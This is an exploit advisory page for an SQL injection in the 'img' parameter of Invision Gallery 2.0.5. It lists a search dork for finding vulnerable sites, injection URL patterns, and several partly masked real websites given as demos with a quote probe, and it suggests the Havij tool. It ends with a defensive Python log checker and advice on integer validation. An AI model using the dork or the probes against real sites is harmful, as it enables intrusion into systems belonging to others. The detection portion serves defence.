Invision Gallery 2.0.5 SQL Injection

2013.01.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

##############
# Exploit Title : Invision Gallery SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# software Homepage: www.invisionpower.com/apps/gallery/
#
# Home : ww.Ashiyane.org
#
# Security Risk : High - SQL Injection
#
# version : 2.0.5
#
# Dork : Invision Gallery 2.0.5 © 2013 IPS, Inc. inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=
#
##############
#location: site/index.php?automodule=gallery&cmd=si&img=[SQL]
# or site/act=module&module=gallery&cmd=si&img=[SQL]
#
#
#DEMO:
#
# www.sgheadphoXXnes.net/index.php?act=module&module=gallery&cmd=si&img=448%27
#
# www.rfdXf.ru/forum/index.php?act=module&module=gallery&cmd=si&img=698%27
#
# www.bambuXrakentaja.com/forums/index.php?act=module&module=gallery&cmd=si&img=41%27
#
# forum.lacriXmosa.ws/index.php?automodule=gallery&cmd=si&img=42%27
#
# www.chXaos.su/forum/index.php?automodule=gallery&cmd=si&img=3
#
# ngevacoXrp.freehostia.com/index.php?automodule=gallery&cmd=si&img=726%27
#
##############
# [Inject with Havij or inject manually]
##############
#Greetz to: My Lord ALLAH
##############
#
#Amirh03in
#
##############

References:

http://www.invisionpower.com/apps/gallery/
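
For defenders, a log check for the request pattern the advisory describes. This is an added example, not code from the advisory or from IPS. It assumes combined-format access logs and that a legitimate `img` value is always a plain integer image id. The log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2013:10:00:01 +0000] "GET /index.php?automodule=gallery&cmd=si&img=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Jan/2013:10:00:07 +0000] "GET /index.php?automodule=gallery&cmd=si&img=42%27 HTTP/1.1" 200 812',
    '203.0.113.9 - - [18/Jan/2013:10:00:09 +0000] "GET /forum/index.php?act=module&module=gallery&cmd=si&img=698%27 HTTP/1.1" 200 790',
    '198.51.100.2 - - [18/Jan/2013:10:01:00 +0000] "GET /index.php?automodule=gallery&cmd=sc&cat=3 HTTP/1.1" 200 4096',
    '198.51.100.2 - - [18/Jan/2013:10:01:05 +0000] "GET /index.php?showtopic=12&img=abc HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")  # assumption: image ids are plain integers


def is_gallery_image_request(params):
    """True for either URL form the advisory lists for cmd=si."""
    def first(key):
        return params.get(key, [""])[0]
    via_automodule = first("automodule") == "gallery"
    via_act = first("act") == "module" and first("module") == "gallery"
    return (via_automodule or via_act) and first("cmd") == "si"


def suspicious_img_values(log_lines):
    """Return (client, decoded img value) for gallery requests with a non-integer img."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so %27 is seen as a single quote.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if not is_gallery_image_request(params):
            continue
        for value in params.get("img", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_img_values(SAMPLE_LOG):
        print(client, repr(value))
```

The same integer-only rule belongs in the application or a WAF in front of it: rejecting or integer-casting `img` before it reaches the query closes the injection point, while the log check only shows who has been probing it.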


Copyright 2024, cxsecurity.com

 
